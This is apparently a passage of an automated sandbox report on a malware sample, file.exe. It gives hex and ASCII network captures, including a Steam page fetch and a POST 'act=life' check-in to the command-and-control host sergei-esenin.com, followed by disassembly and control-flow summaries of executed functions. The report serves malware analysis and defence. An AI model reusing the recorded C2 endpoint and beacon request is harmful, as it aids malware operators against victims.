                                                                                                                  Set-Cookie: sessionid=24b9f88d4f7ed18e8e234bff; Path=/; Secure; SameSite=None
                                                                                                                  Set-Cookie: steamCountry=US%7Cd7fb65801182a5f50a3169fe2a0b7ef0; Path=/; Secure; HttpOnly; SameSite=None
                                                                                                                  2024-10-06 16:42:07 UTC14514INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0d 0a 09 09 3c
                                                                                                                  Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
                                                                                                                  2024-10-06 16:42:07 UTC16384INData Raw: 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0d 0a 09 09 6a 51 75 65 72 79 28 66 75 6e 63 74 69 6f 6e 28 24 29 20 7b 0d 0a 09 09 09 24 28 27 23 67 6c 6f 62 61 6c 5f 68 65 61 64 65 72 20 2e 73 75 70 65 72 6e 61 76 27 29 2e 76 5f 74 6f 6f 6c 74 69 70 28 7b 27 6c 6f 63 61 74 69 6f 6e 27 3a 27 62 6f 74 74 6f 6d 27 2c 20 27 64 65 73 74 72 6f 79 57 68 65 6e 44 6f 6e 65 27 3a 20 66 61 6c 73 65 2c 20 27 74 6f 6f 6c 74 69 70 43 6c 61 73 73 27 3a 20 27 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 65 6e 74 27 2c 20 27 6f 66 66 73 65 74 59 27 3a 2d 36 2c 20 27 6f 66 66 73 65 74 58 27 3a 20 31 2c 20 27 68 6f 72 69 7a 6f 6e 74 61 6c 53 6e 61 70 27 3a 20 34 2c 20 27 74 6f 6f 6c 74 69 70 50 61 72 65 6e 74 27 3a 20 27 23 67 6c 6f
                                                                                                                  Data Ascii: <script type="text/javascript">jQuery(function($) {$('#global_header .supernav').v_tooltip({'location':'bottom', 'destroyWhenDone': false, 'tooltipClass': 'supernav_content', 'offsetY':-6, 'offsetX': 1, 'horizontalSnap': 4, 'tooltipParent': '#glo
                                                                                                                  2024-10-06 16:42:07 UTC3768INData Raw: 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 73 75 6d 6d 61 72 79 5f 66 6f 6f 74 65 72 22 3e 0d 0a 09 09 09 09 09 09 09 3c 73 70 61 6e 20 64 61 74 61 2d 70 61 6e 65 6c 3d 22 7b 26 71 75 6f 74 3b 66 6f 63 75 73 61 62 6c 65 26 71 75 6f 74 3b 3a 74 72 75 65 2c 26 71 75 6f 74 3b 63 6c 69 63 6b 4f 6e 41 63 74 69 76 61 74 65 26 71 75 6f 74 3b 3a 74 72 75 65 7d 22 20 63 6c 61 73 73 3d 22 77 68 69 74 65 4c 69 6e 6b 22 20 63 6c 61 73 73 3d 22 77 68 69 74 65 4c 69 6e 6b 22 3e 56 69 65 77 20 6d 6f 72 65 20 69 6e 66 6f 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 09 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 20 24 4a 28 20 66 75 6e 63 74 69 6f 6e 28 29
                                                                                                                  Data Ascii: <div class="profile_summary_footer"><span data-panel="{&quot;focusable&quot;:true,&quot;clickOnActivate&quot;:true}" class="whiteLink" class="whiteLink">View more info</span></div><script type="text/javascript"> $J( function()
                                                                                                                  2024-10-06 16:42:07 UTC171INData Raw: 09 3c 73 70 61 6e 3e 56 69 65 77 20 6d 6f 62 69 6c 65 20 77 65 62 73 69 74 65 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 0d 0a 09 3c 2f 64 69 76 3e 09 3c 21 2d 2d 20 72 65 73 70 6f 6e 73 69 76 65 5f 70 61 67 65 5f 63 6f 6e 74 65 6e 74 20 2d 2d 3e 0d 0a 0d 0a 3c 2f 64 69 76 3e 09 3c 21 2d 2d 20 72 65 73 70 6f 6e 73 69 76 65 5f 70 61 67 65 5f 66 72 61 6d 65 20 2d 2d 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e
                                                                                                                  Data Ascii: <span>View mobile website</span></div></div></div></div>... responsive_page_content --></div>... responsive_page_frame --></body></html>


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  1192.168.2.749701172.67.206.2044435748C:\Users\user\Desktop\file.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-10-06 16:42:08 UTC264OUTPOST /api HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                  Content-Length: 8
                                                                                                                  Host: sergei-esenin.com
                                                                                                                  2024-10-06 16:42:08 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                  Data Ascii: act=life
                                                                                                                  2024-10-06 16:42:08 UTC784INHTTP/1.1 200 OK
                                                                                                                  Date: Sun, 06 Oct 2024 16:42:08 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: close
                                                                                                                  Set-Cookie: PHPSESSID=a11tpg7141mtdfnehsqjhef810; expires=Thu, 30 Jan 2025 10:28:47 GMT; Max-Age=9999999; path=/
                                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                  Pragma: no-cache
                                                                                                                  CF-Cache-Status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ztQxJPDhKS6D%2BRMUWuqAQfauQob5hfsei658sQH0TDsmFnRnx8%2Bo1EsOQ6hjSMFUyp%2B8n2iXfJtIj3OHrpyh975IuiF2EKBkz%2Fh%2FH%2FX8S2Nq4vnPfFX4e9Rh%2BpGJx6bnR%2Bzfbg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8ce71a58edb91778-EWR
                                                                                                                  2024-10-06 16:42:08 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                                                                                                  Data Ascii: aerror #D12
                                                                                                                  2024-10-06 16:42:08 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 0


                                                                                                                  Statistics

                                                                                                                  CPU Usage

                                                                                                                  Click to jump to process

                                                                                                                  Memory Usage

                                                                                                                  Click to jump to process

                                                                                                                  High Level Behavior Distribution

                                                                                                                  Click to dive into process behavior distribution

                                                                                                                  System Behavior

                                                                                                                  General

                                                                                                                  Target ID:0
                                                                                                                  Start time:12:42:02
                                                                                                                  Start date:06/10/2024
                                                                                                                  Path:C:\Users\user\Desktop\file.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:"C:\Users\user\Desktop\file.exe"
                                                                                                                  Imagebase:0xf0000
                                                                                                                  File size:1'830'400 bytes
                                                                                                                  MD5 hash:30DA1D41D3AEF9C33749C840AE2343B8
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:low
                                                                                                                  Has exited:true

                                                                                                                  Disassembly

                                                                                                                  Reset < >

                                                                                                                    Execution Graph

                                                                                                                    Execution Coverage:1%
                                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                                    Signature Coverage:61.1%
                                                                                                                    Total number of Nodes:54
                                                                                                                    Total number of Limit Nodes:7
                                                                                                                    execution_graph 20951 1360d2 20952 1360fa 20951->20952 20953 13614e 20952->20953 20957 135bb0 LdrInitializeThunk 20952->20957 20956 135bb0 LdrInitializeThunk 20953->20956 20956->20953 20957->20953 20976 1350fa 20977 135176 LoadLibraryExW 20976->20977 20978 13514c 20976->20978 20979 13518c 20977->20979 20978->20977 20980 10049b 20984 100227 20980->20984 20981 100455 20983 135700 2 API calls 20981->20983 20985 100308 20983->20985 20984->20981 20984->20985 20986 135700 20984->20986 20987 135797 20986->20987 20988 13571b 20986->20988 20990 13578c 20986->20990 20992 135729 20986->20992 20993 133220 20987->20993 20988->20987 20988->20990 20988->20992 20990->20981 20991 135776 RtlReAllocateHeap 20991->20990 20992->20991 20994 1332a2 RtlFreeHeap 20993->20994 20995 1332ac 20993->20995 20996 133236 20993->20996 20994->20995 20995->20990 20996->20994 20997 1364b8 20999 1363f2 20997->20999 20998 13646e 20999->20998 21001 135bb0 LdrInitializeThunk 20999->21001 21001->20998 21002 13673d 21003 1366aa 21002->21003 21004 136793 21003->21004 21007 135bb0 LdrInitializeThunk 21003->21007 21006 1367b3 21007->21006 21008 ffca0 21011 ffcdc 21008->21011 21009 fffe4 21010 133220 RtlFreeHeap 21010->21009 21011->21009 21011->21010 21012 133202 RtlAllocateHeap 21013 12d9cb 21015 12d9fb 21013->21015 21014 12da65 21015->21014 21017 135bb0 LdrInitializeThunk 21015->21017 21017->21015 21018 13626a 21020 13628d 21018->21020 21019 13636e 21021 1362de 21020->21021 21025 135bb0 LdrInitializeThunk 21020->21025 21021->21019 21024 135bb0 LdrInitializeThunk 21021->21024 21024->21019 21025->21021 21026 fd110 21027 fd119 21026->21027 21028 fd2ee ExitProcess 21027->21028 21029 fd2e9 21027->21029 21032 100b40 FreeLibrary 21027->21032 21033 1356e0 FreeLibrary 21029->21033 21032->21029 21033->21028

                                                                                                                    Executed Functions

                                                                                                                    Function 001350FA Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 63libraryCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 25 1350fa-13514a 26 135176-135186 LoadLibraryExW 25->26 27 13514c-13514f 25->27 29 1352d8-135304 26->29 30 13518c-1351b5 26->30 28 135150-135174 call 135a50 27->28 28->26 30->29
                                                                                                                    APIs
                                                                                                                    • LoadLibraryExW.KERNEL32(19A41BB1,00000000,00000800), ref: 00135182
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1310246800.00000000000F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1310215430.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.0000000000150000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310782638.00000000003F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310960227.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310989435.0000000000587000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_f0000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: LibraryLoad
                                                                                                                    • String ID: <I$)$<I$)$@^
                                                                                                                    • API String ID: 1029625771-935358343
                                                                                                                    • Opcode ID: 33e87b169afab9d5edd8023eaf1536be285a3253a3ed639c66c6a032044987e3
                                                                                                                    • Instruction ID: 053d25d1cb8b994e9202e0cab58091ef38bc3316c61465585722b4e2ceb18b55
                                                                                                                    • Opcode Fuzzy Hash: 33e87b169afab9d5edd8023eaf1536be285a3253a3ed639c66c6a032044987e3
                                                                                                                    • Instruction Fuzzy Hash: 6E21AE39108384CFC300DF68D89172AB7E5BB6A300F69882CE1C5D7362D736D955CB56
                                                                                                                    Function 000FFCA0 Relevance: 5.4, Strings: 4, Instructions: 373COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 33 ffca0-ffcda 34 ffcdc-ffcdf 33->34 35 ffd0b-ffe22 33->35 38 ffce0-ffd09 call 102690 34->38 36 ffe5b-ffe8c 35->36 37 ffe24 35->37 40 ffe8e-ffe8f 36->40 41 ffeb6-ffec5 call 100b50 36->41 39 ffe30-ffe59 call 102760 37->39 38->35 39->36 45 ffe90-ffeb4 call 102700 40->45 49 ffeca-ffecf 41->49 45->41 51 ffed5-ffef8 49->51 52 fffe4-fffe6 49->52 54 fff2b-fff2d 51->54 55 ffefa 51->55 53 1001b1-1001bb 52->53 57 fff30-fff3a 54->57 56 fff00-fff29 call 1027e0 55->56 56->54 59 fff3c-fff3f 57->59 60 fff41-fff49 57->60 59->57 59->60 62 fff4f-fff76 60->62 63 1001a2-1001ad call 133220 60->63 64 fffab-fffb5 62->64 65 fff78 62->65 63->53 69 fffeb 64->69 70 fffb7-fffbb 64->70 68 fff80-fffa9 call 102840 65->68 68->64 71 fffed-fffef 69->71 73 fffc7-fffcb 70->73 74 10019a 71->74 76 ffff5-10002c 71->76 73->74 75 fffd1-fffd8 73->75 74->63 78 fffde 75->78 79 fffda-fffdc 75->79 80 10005b-100065 76->80 81 10002e-10002f 76->81 82 fffc0-fffc5 78->82 83 fffe0-fffe2 78->83 79->78 85 1000a4 80->85 86 100067-10006f 80->86 84 100030-100059 call 1028a0 81->84 82->71 82->73 83->82 84->80 87 1000a6-1000a8 85->87 89 100087-10008b 86->89 87->74 91 1000ae-1000c5 87->91 89->74 90 100091-100098 89->90 93 10009a-10009c 90->93 94 10009e 90->94 95 1000c7 91->95 96 1000fb-100102 91->96 93->94 97 100080-100085 94->97 98 1000a0-1000a2 94->98 99 1000d0-1000f9 call 102900 95->99 100 100130-10013c 96->100 101 100104-10010d 96->101 97->87 97->89 98->97 99->96 102 1001c2-1001c7 100->102 104 100117-10011b 101->104 102->63 104->74 106 10011d-100124 104->106 107 100126-100128 106->107 108 10012a 106->108 107->108 109 100110-100115 108->109 110 10012c-10012e 108->110 109->104 111 100141-100143 109->111 110->109 111->74 112 100145-10015b 111->112 112->102 113 10015d-10015f 112->113 114 100163-100166 113->114 115 100168-100188 call 102030 114->115 116 1001bc 114->116 119 100192-100198 115->119 120 10018a-100190 115->120 116->102 119->102 120->114 120->119
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1310246800.00000000000F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1310215430.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.0000000000150000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310782638.00000000003F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310960227.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310989435.0000000000587000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_f0000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: J|BJ$V$VY^_$t
                                                                                                                    • API String ID: 0-3701112211
                                                                                                                    • Opcode ID: 34de0c8a2cd0983f1beaabd500395d1e18e5f6afea7d742d99fc480223f1fe8f
                                                                                                                    • Instruction ID: ffeb4d3024f3e1d0e6e63c864c9f17451a3aa673afc586f55527ddd638114112
                                                                                                                    • Opcode Fuzzy Hash: 34de0c8a2cd0983f1beaabd500395d1e18e5f6afea7d742d99fc480223f1fe8f
                                                                                                                    • Instruction Fuzzy Hash: B2D1777450C3859BD311DF14949472FBBE1AF9AB44F18882CF5C98B2A2C376CD49EB92
                                                                                                                    Function 000FD110 Relevance: 1.7, APIs: 1, Instructions: 168COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 157 fd110-fd11b call 134cc0 160 fd2ee-fd2f6 ExitProcess 157->160 161 fd121-fd130 call 12c8d0 157->161 165 fd2e9 call 1356e0 161->165 166 fd136-fd15f 161->166 165->160 170 fd196-fd1bf 166->170 171 fd161 166->171 172 fd1f6-fd20c 170->172 173 fd1c1 170->173 174 fd170-fd194 call fd300 171->174 176 fd20e-fd20f 172->176 177 fd239-fd23b 172->177 175 fd1d0-fd1f4 call fd370 173->175 174->170 175->172 180 fd210-fd237 call fd3e0 176->180 181 fd23d-fd25a 177->181 182 fd286-fd2aa 177->182 180->177 181->182 188 fd25c-fd25f 181->188 184 fd2ac-fd2af 182->184 185 fd2d6 call fe8f0 182->185 189 fd2b0-fd2d4 call fd490 184->189 194 fd2db-fd2dd 185->194 192 fd260-fd284 call fd440 188->192 189->185 192->182 194->165 197 fd2df-fd2e4 call 102f10 call 100b40 194->197 197->165
                                                                                                                    APIs
                                                                                                                    • ExitProcess.KERNEL32(00000000), ref: 000FD2F1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1310246800.00000000000F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1310215430.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.0000000000150000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310782638.00000000003F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310960227.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310989435.0000000000587000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_f0000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ExitProcess
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 621844428-0
                                                                                                                    • Opcode ID: ddb1e7e1af91078ca3a3600b9a13a88297a15ef37524d70f376f334a167b6d6c
                                                                                                                    • Instruction ID: b91875217078f987f5e3f754f1a2e59fb7fd9077c5d1fadee7bd9ec5f617bd6c
                                                                                                                    • Opcode Fuzzy Hash: ddb1e7e1af91078ca3a3600b9a13a88297a15ef37524d70f376f334a167b6d6c
                                                                                                                    • Instruction Fuzzy Hash: 1A41687040D384ABC341BB64D188A2EFBF6EF62744F148C0DE6C497652C336D810ABA7
                                                                                                                    Function 00135700 Relevance: 1.6, APIs: 1, Instructions: 69memoryCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 202 135700-135714 203 1357b2 202->203 204 1357b0 202->204 205 135797-1357a5 call 133220 202->205 206 13571b-135722 202->206 207 135729-13574a 202->207 208 13578c-135795 call 1331a0 202->208 211 1357b4-1357b9 203->211 204->203 205->204 206->203 206->204 206->205 206->207 212 135776-13578a RtlReAllocateHeap 207->212 213 13574c-13574f 207->213 208->211 212->211 216 135750-135774 call 135b30 213->216 216->212
                                                                                                                    APIs
                                                                                                                    • RtlReAllocateHeap.NTDLL(?,00000000,?,?), ref: 00135784
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1310246800.00000000000F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1310215430.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.0000000000150000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310782638.00000000003F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310960227.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310989435.0000000000587000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_f0000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AllocateHeap
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1279760036-0
                                                                                                                    • Opcode ID: a6d28214a42d8dbb322099826579a2f2a03340c5636d3caf950d92d7f5a92da7
                                                                                                                    • Instruction ID: 895422fc7efa9d046603166a8c6245b363b0dc7007b2492039308f446b18840f
                                                                                                                    • Opcode Fuzzy Hash: a6d28214a42d8dbb322099826579a2f2a03340c5636d3caf950d92d7f5a92da7
                                                                                                                    • Instruction Fuzzy Hash: 0711A07591C240EBC301AF28E841A1BBBF6AF96B10F458828E8C49B221D335D951CB97
                                                                                                                    Function 00135BB0 Relevance: 1.5, APIs: 1, Instructions: 14libraryCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 229 135bb0-135be2 LdrInitializeThunk
                                                                                                                    APIs
                                                                                                                    • LdrInitializeThunk.NTDLL(0013973D,005C003F,00000006,?,?,00000018,8C8D8A8B,?,?), ref: 00135BDE
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1310246800.00000000000F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1310215430.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.0000000000150000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310782638.00000000003F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310960227.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310989435.0000000000587000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_f0000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: InitializeThunk
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2994545307-0
                                                                                                                    • Opcode ID: b66ff63dfd389af1bc8afcc0025f999e8b2b47508af02e865142dda64173a8e3
                                                                                                                    • Instruction ID: fb6f357373f259be8b0e83fffc5d2a3912a28e0da7d2036ce94b71e982b3a7e9
                                                                                                                    • Opcode Fuzzy Hash: b66ff63dfd389af1bc8afcc0025f999e8b2b47508af02e865142dda64173a8e3
                                                                                                                    • Instruction Fuzzy Hash: 76E0FE75908316AB9A09CF45C14444EFBE5BFC4714F11CC8DA4D867210D3B0AD46DF82
                                                                                                                    Function 0013695B Relevance: 1.4, Strings: 1, Instructions: 100COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 258 13695b-13696b call 134a20 261 136981-136a02 258->261 262 13696d 258->262 264 136a36-136a42 261->264 265 136a04 261->265 263 136970-13697f 262->263 263->261 263->263 267 136a85-136a9f 264->267 268 136a44-136a4f 264->268 266 136a10-136a34 call 1373e0 265->266 266->264 270 136a50-136a57 268->270 272 136a60-136a66 270->272 273 136a59-136a5c 270->273 272->267 274 136a68-136a7d call 135bb0 272->274 273->270 275 136a5e 273->275 277 136a82 274->277 275->267 277->267
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1310246800.00000000000F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1310215430.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.0000000000150000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310782638.00000000003F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310960227.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310989435.0000000000587000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_f0000_file.jbxd
                                                                                                                    Similarity
